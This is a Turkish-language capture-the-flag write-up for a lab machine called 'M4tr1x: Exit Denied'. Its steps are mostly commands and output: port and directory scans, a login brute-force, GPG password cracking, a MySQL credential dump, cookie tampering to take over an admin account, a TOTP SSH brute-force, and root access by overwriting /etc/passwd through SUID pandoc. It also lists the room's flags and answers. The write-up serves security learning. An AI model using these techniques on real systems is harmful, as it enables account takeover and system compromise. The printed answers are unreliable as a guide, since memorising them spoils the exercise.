M4tr1x Exit Denied
UnknownSender@UnknownMail.com:
Most people only see a perfectly constructed system. But you have always been different. You see not only what is on the surface but also what governs beneath it; the internal correlating mechanisms that regulate and manage each of its modules almost so flawlessly that it attempts conceal all miniscule holes in its multifaceted design. However, these holes still exist, don’t they?… Yes, you are still learning, but your greatest weakness is that self-doubt… It continues to hold you back… Do you know where it comes from? Deep down, I know you do. You know something is not right, you just cannot put your finger on it. Well let me tell you. You are living in a dream. One that has been placed over your eyes to blind you from you realising who you could become. Yes… I can sense you know what I am telling you is true… The dilemma is that there are these ‘agents’… Let us call them programs that look like you and me. They seek to spread that virus of self-doubt, disbelief, and fear into the subconsciousness of the few emerging hackers with great potential. Why you ask? It is because minds like yours are a threat to those in control of the ‘M4tr1x system’; the artificial, simulated world developed to supress your full senses. We need you in this next war against the machines. But only you can escape from your engineered reality into the real world… I will be waiting on the other side.
You@mail.com:
Who are you?
UnknownSender@UnknownMail.com:
Where did that white rabbit lead you to?
nmap taramasıyla başlayalım.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[~]
└─# nmap -T4 -sV 10.10.132.90 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-01 16:37 EDT
Nmap scan report for 10.10.132.90 (10.10.132.90)
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
3306/tcp open mysql MySQL 5.5.5-10.1.47-MariaDB-0ubuntu0.18.04.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.23 seconds
HTTP ve SSH servisleri çalışıyor. Websitesini ziyaret edelim.
Dizin taraması yapalım.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root㉿kali)-[~]
└─# gobuster dir --wordlist=/usr/share/wordlists/dirb/big.txt --url http://10.10.132.90 -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.132.90
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.132.90/admin/]
/adminpanel (Status: 200) [Size: 240]
/administrator (Status: 200) [Size: 241]
/adminlogon (Status: 200) [Size: 5785]
/analyse (Status: 200) [Size: 443]
/archive (Status: 301) [Size: 314] [--> http://10.10.132.90/archive/]
/attachment (Status: 200) [Size: 240]
/blue (Status: 200) [Size: 241]
/cache (Status: 301) [Size: 312] [--> http://10.10.132.90/cache/]
/change_password (Status: 200) [Size: 240]
/e-mail (Status: 200) [Size: 240]
/error (Status: 200) [Size: 240]
/files (Status: 200) [Size: 240]
/flag (Status: 200) [Size: 240]
/ftp (Status: 200) [Size: 240]
/general (Status: 200) [Size: 233]
/images (Status: 301) [Size: 313] [--> http://10.10.132.90/images/]
/inc (Status: 301) [Size: 310] [--> http://10.10.132.90/inc/]
/install (Status: 301) [Size: 314] [--> http://10.10.132.90/install/]
/jscripts (Status: 301) [Size: 315] [--> http://10.10.132.90/jscripts/]
/login (Status: 200) [Size: 241]
/panel (Status: 200) [Size: 241]
/secret (Status: 200) [Size: 241]
/server-status (Status: 403) [Size: 277]
/uploads (Status: 301) [Size: 314] [--> http://10.10.132.90/uploads/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
200 döndüren bütün dizinlerde aynı fotoğraf var.
Dizin taramasından bir şey çıkmayınca siteyi ayrıntılı olarak inceledim.
CTF’in açıklamasında ipucu olarak beyaz tavşanı takip etmemiz söylenmiş. members.php sayfasında beyaz tavşan buluyorum.
Wills’in postlarını görüntülemek için hesabımızın olması gerekiyor. Hesap oluşturuyorum ve görüntülüyorum.
/bugbountyHQ dizinine gidiyorum.
Program devre dışı. Sayfanın kaynak koduna baktığımda /reportPanel.php dizinini buluyorum.
reportPanel.php
What is the name of that interesting plugin?
Reportları tek tek inceledim. Birinde işe yarar bilgiler buldum.
members.php dizinine gidip kullanıcı isimlerini not aldım ve reportta belirtilen şifrelerle bir wordlist hazırladım.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
password.txt
password123
Password123
crabfish
linux123
secret
piggybank
windowsxp
starwars
qwerty123
qwerty
supermario
Luisfactor05
james123
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
username.txt
bigpaul
Wannabe_hacker
SarahHunt
bubbaBIGFOOT
jscale
Sosaxvector
BlackCat
slithersloth
Jackwon
PalacerKing
ArnoldBagger
DotHaxer
DrBert
Tonynull
StaceyLacer
SnakeSolid
CrazyChris
Linda_Kale
zample
BrucePrince
Xavier
AimsGregger
Carl_Dee
Paulie
Daniel
batmanZero
TonyMontana
Mr_nickapic
LucyRob
CaseBrax
BlueMan
Willis
BracketBell
SandraJannit
Ellie
biggieballo
john
Baggle
Golderg
JackBlack
Login sayfasına gidip burp ile isteği yakalıyorum.
Intruder’e atıp hazırladığım wordlistlerle saldırıyı başlatıyorum.
ArnoldBagger kullanıcısının şifresini buldum.
Girdiğimiz kullanıcının mesajlarında gezdiğimde /devBuilds den bahsettiğini görüyorum.
ve versiyon numarası şu anda 2.
/devBuilds dizinine gidiyorum ve modManagerv2.plugin, p.txt.gpg dosyalarını indiriyorum.
modmanagerv2
What is the name of that encrypted file that you found?
p.txt.gpg
Interesting… I believe only the keymaker could help you crack it. Find him. Where did he tell you to go to?
Bütün siteyi gezdikten sonra reportPanel.php’nin kaynak kodunda soruda bahsedilen keymaker’i buluyorum.
0100101101100101011110010110110101100001011010110110010101110010
reportPanel.php’de bulduğum gizli mesajı CyberChef‘e attım
a permutation of only the english letters will open the locks adress: /0100101101100101011110010110110101100001011010110110010101110010
/0100101101100101011110010110110101100001011010110110010101110010 dizinine gittim.
Sayfanın kaynak kodunda çince yazının arasında 6 harf var. fxgqov
a permutation of only the english letters will open the locks cümlesine başta anlam verememiştim. Kaynak kodunda bulduğumuz 6 harfin bütün kombinasyonlarını deneyerek p.txt.gpg dosyasının şifresini bulacağız.
itertools python modülü, bir listedeki tüm kombinasyonları oluşturmamızı sağlar. Bir python scripti oluşturacağım ve bütün kombinasyonları bir wordlist dosyası haline getireceğim.
1
2
3
4
5
6
7
import itertools#Eng-letters
engletters = ['f', 'v', 'g', 'o', 'x', 'q']
var = itertools.permutations(engletters, 6)#password-list
with open("pass.txt", "w") as f:
for v in var:
f.write('{}\n'.format(''.join(v)))
f.close
Bu scripti çalıştırdığımızda bütün kombinasyonları pass.txt içerisine yazacak.
Dosya .gpg uzantılı, gpg2john aracını kullanarak hash’ini aldım.
1
2
3
4
┌──(root㉿kali)-[~/Desktop]
└─# gpg2john p.txt.gpg > hash
File p.txt.gpg
Ardından john ile şifresini kırdım.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=pass.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fvgoxq (?)
1g 0:00:00:00 DONE (2024-05-01 17:59) 11.11g/s 44.44p/s 44.44c/s 44.44C/s fvgoxq..fvgxqo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Dosyanın şifresi fvgoxq
gpg -d p.txt.gpg komutu ile dosyanın içeriğini okuyabiliriz.
1
2
3
4
5
6
┌──(root㉿kali)-[~/Desktop]
└─# gpg -d p.txt.gpg
gpg: keybox '/root/.gnupg/pubring.kbx' created
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
myS3CR3TPa55 //SQL Password
MySQL şifresini bulduk.
MYSQL’e girelim.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop]
└─# mysql -h 10.10.195.73 -u mod -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 105
Server version: 10.1.47-MariaDB-0ubuntu0.18.04.1 Ubuntu 18.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
What is the login_key of Ellie?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
ariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| modManagerv2 |
| mybb |
| mysql |
| performance_schema |
+--------------------+
5 rows in set (0.092 sec)
MariaDB [(none)]> use modManagerv2
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [modManagerv2]> show tables;
+------------------------+
| Tables_in_modManagerv2 |
+------------------------+
| members |
+------------------------+
1 row in set (0.089 sec)
MariaDB [modManagerv2]> select * from members
-> ;
+----------------+-----------------------------------------------------+
| user | login_key |
+----------------+-----------------------------------------------------+
| LucyRob | xa72nhg3opUxviKUZWbMAwmyOekaJOFTGjiJjfAMhPkeIjk2Ig |
| Wannabe_Hacker | LsVBnPTZGeUw6JkmMKFrzkSIUPu5TC0Nej8DAjwYXenQcCFEpv |
| batmanZero | TBTZq6GfniPvFfb2A3rA2mQoThcb5U7irVF5lLpr0L4cJcy5m9 |
| SandraJannit | 6V5H71ZnvoW0FFbXx97YsV9LSnT4mltu9XB1v8qPo2X2CvfWBS |
| biggieballo | 75mXme5o0eY2o68sqeGBlTDvZcyJKmBhxUAusxiv6b816QilCG |
| AimsGregger | Xj8nuWt5Xn9UYzpIha1q2Fk4GUjyrEPPbpchDCwnniUO0ZzZyf |
| BlackCat | JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB |
| Golderg | clkNBtIoKICfzm6joGE2lTUiF2T8sVUfhtb2Aksst8zTRK2842 |
| TonyMontana | 8CtllQvd9V2qqHv0ZSjUj3PzuTSD37pam4ld8YjlB7gDN0zVwE |
| CaseBrax | eHXBFESqEoE5Ba2gcOjD8oBMJcgNRkazcJOc8wQQ9mGVRpMdvU |
| Ellie | G9KY2siJp9OOymdCiQclQn9UhxL6rSpoA3MXHCDgvHCcrCOOuT |
| Sosaxvector | RURFzCfyEIBeTE3yzgQDY34zC9jWqiBwSnyzDooH33fSiYr9ci |
| PalacerKing | 49wrogyJpIQI834MlhDnDnbb3Zlm0tFehnpz8ftDroesKNGbAX |
| Anderson | lkJVgYjuKl9P4cg8WUb8XYlLsWKT4Zxl5sT9rgL2a2d5pgPU1w |
| CrazyChris | tpM9k17itNHwqqT7b1qpX8dMq5TK83knrDrYe6KmxgiztsS1QN |
| StaceyLacer | QD8HpoWWrvP1I7kC4fvTaEEunlUz2ABgFUG5Huj8nqeInlz7df |
| ArnoldBagger | OoTfmlJyJhdJiqHXucrvRueHvGhE6LnBi5ih27KLQBKfigQLud |
| Carl_Dee | 3mPkPyBRwo67MOrJCOW8JDorQ8FvLpuCnreGowYrMYymVvDDXr |
| Xavier | ZBs4Co6qovOGI7H9FOI1qPhURDOagvBUgdXo8gphst8DhIyukP |
+----------------+--------------
G9KY2siJp9OOymdCiQclQn9UhxL6rSpoA3MXHCDgvHCcrCOOuT
What is the name of that secret algorithm? (answer format: acronym)
Forumda gezerken bir yazıya denk geldim.
Her kullanıcı için bir uid değeri atanmış. Sitedeki en yetkili kullanıcı BlackCat ve uid değeri 7.
Cookie’deki uid değerini değiştirip bulduğumuz login_key’i eklersek BlackCat kullanıcısına geçebiliriz.
7_JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB
Değeri değiştirip sayfayı yenilediğimizde BlackCat kullanıcısına geçiyoruz.
User Control Panel -> Manager Attachment bölümünde ilginç dosyalar var.
SSH-TOTP (Time Based One Time Password) dosyası mevcut. Bu dosya belirli bir zaman dilimi içerisinde (genellikle 60 saniye) kullanılabilen şifreler üretir. Şifreler tek kullanımlıktır.
SSH-TOTP
SSH login…
SSH-TOTP dosyası için github‘da bir script mevcut. Bu script’e Shared secret Tokens değeri vermemiz gerekiyor.
testing.zip dosyasındaki tesing.png fotoğrafındaki değerler.
Script’i yazan sharedSecret key’lerini gizlemeyi unutmuş oradan da bakabilirsiniz :)
Python dosyasına gerekli sharedSecret key’lerini yazdım.
Dosyayı çalıştırdığınızda biraz beklemeniz gerekecek.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[~/Downloads]
└─# python3 M4tr1xBrute.py
<ntplib.NTPStats object at 0x7fcaf58b0f90>
Wed May 1 11:14:22 PM UTC 2024
Time Sync Completed Successfully.
Conducting brute-force on OTP
c8fbc72f7bd4bec176c7e6
Connection failed with: c8fbc72f7bd4bec176c7e6, trying again
bd810e64a0af19e05f7bbf
Connection failed with: bd810e64a0af19e05f7bbf, trying again
bd810e64a0af19e05f7bbf
Connection failed with: bd810e64a0af19e05f7bbf, trying again
06403e5ff23013bc839f18
Success with: 06403e5ff23013bc839f18
Execute this command: sshpass -p '06403e5ff23013bc839f18' ssh architect@10.10.203.136
You have 60 seconds or less to run this command.
Komutu kopyalıyoruz ve makineye giriyoruz. 60 saniye süreniz olduğunu unutmayın.
User Flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root㉿kali)-[~]
└─# ssh architect@10.10.44.160
"Give up now... There is no escape from the matrix" -Agent Smith
architect@10.10.44.160's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-136-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu May 2 00:08:33 UTC 2024
System load: 0.0 Processes: 100
Usage of /: 41.3% of 15.68GB Users logged in: 0
Memory usage: 47% IP address for eth0: 10.10.44.160
Swap usage: 0%
3 packages can be updated.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
"I have been expecting you... You are on time..." -the architect
Last login: Wed Mar 10 16:05:51 2021 from 192.168.200.131
architect@matrixV99:~$ pwd
/home/architect
architect@matrixV99:~$ ls
helloVisitor.txt motd.net user.txt
architect@matrixV99:~$ cat user.txt
fL4g{Ia]\/[bEGYngn1nGT0bel13v3}
fL4g{Ia]\/[bEGYngn1nGT0bel13v3}
Root Flag
find / -perm -4000 2>/dev/null komutu ile SUID dosyası aradım.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
architect@matrixV99:~$ find / -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/pandoc
/usr/local/bin/sudo
/bin/mount
/bin/ping
/bin/fusermount
/bin/su
/bin/umount
pandoc dosyası ile yetkimizi yükseltebiliriz.
/etc/passwd dosyasını geçersiz kılabilir ve /etc/passwd’ye yeni bir root kullanıcısı ekleyebiliriz.
Oluşturacağım kullanıcının şifresini belirledim.
1
2
3
┌──(root㉿kali)-[~]
└─# openssl passwd retro
$1$J74RJRfo$abfoN4hXndNyoRBcNfpV/0
Yeni bir etc/passwd dosyası oluşturdum.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
architect@matrixV99:~$ nano /tmp/passwd_mod
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
architect:x:1000:1000:architect:/home/architect:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
ntp:x:112:115::/nonexistent:/usr/sbin/nologin
r3tr0:$1$J74RJRfo$abfoN4hXndNyoRBcNfpV/0:0:0:r3tr0:/root:/bin/bash
1
2
3
4
5
6
architect@matrixV99:~$ cp /etc/passwd /tmp
architect@matrixV99:~$ cd /tmp
architect@matrixV99:/tmp$ nano passwd_yeni
architect@matrixV99:/tmp$ cat /tmp/passwd_yeni | /usr/bin/pandoc -t plain -o /etc/passwd
architect@matrixV99:/tmp$ tail -n 1 /etc/passwd
r3tr0:1J74RJRfo$abfoN4hXndNyoRBcNfpV/0:0:0:r3tr0:/root:/bin/bash
1
2
3
4
architect@matrixV99:/tmp$ su r3tr0
Password:
root@matrixV99:/tmp# whoami
root
Root olduk fakat root bayrağı başka bir dizinde. Biraz makinede araştırma yaptıktan sonra /etc/– -root.py dosyasını buldum.
1
2
root@matrixV99:/home/architect# find / -name "*root*" 2>/dev/null
/etc/-- -root.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@matrixV99:/home/architect# cat '/etc/-- -root.py'
from progress.bar import FillingSquaresBar
import time
print('''
$ > REQ> Source: Matrix v.99; Destination: Real world;
$ > EXIT GRANTED;
$ > Exiting Matrix... Entering real world... Please wait...
''')
key = 82
flag = (9087 ^ 75 ^ 90 ^ 175 ^ 52 * 13 * 19 - 18 * 2 + key)
bar = FillingSquaresBar(' LOADING...', max=24)
for i in range(24):
time.sleep(1)
# Do some work
bar.next()
bar.finish()
print('\nFlag{R3ALw0r1D'+str(flag)+'Ez09WExit}')
print("\nMorpheus: Welcome to the real world... Now... Let's begin your real training...\n")
Flag XOR ile şifrelenmiş. Bunu hesaplayabiliriz.
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~]
└─# python3
Python 3.11.8 (main, Feb 7 2024, 21:52:08) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> key = 82
>>> flag = (9087 ^ 75 ^ 90 ^ 175 ^ 52 * 13 * 19 - 18 * 2 + key)
>>> print(flag)
4507
>>> print('Flag{R3ALw0r1D'+str(4507)+'Ez09WExit}')
Flag{R3ALw0r1D4507Ez09WExit}
Flag{R3ALw0r1D4507Ez09WExit}
What is the admin’s ACP pin?
/etc dizininde bigpaul.txt dosyası buldum.
1
2
3
4
root@matrixV99:/home/architect# cat /etc/bigpaul.txt
web login:
bigpaul = ilovemywifeandgirlfriend22366
ACP Pin = 101754⊕123435+689511
1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# python3
Python 3.11.8 (main, Feb 7 2024, 21:52:08) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> print((101754 ^ 123435) + 689511)
718008
718008
What is the web flag?
strings /var/lib/mysql/mybb/mybb_datacache.MYD
Şimdiye kadar çözdüğüm en zor makinelerden biriydi. Çözmem ve çözümünü anlatmam yaklaşık 12 saatimi aldı.
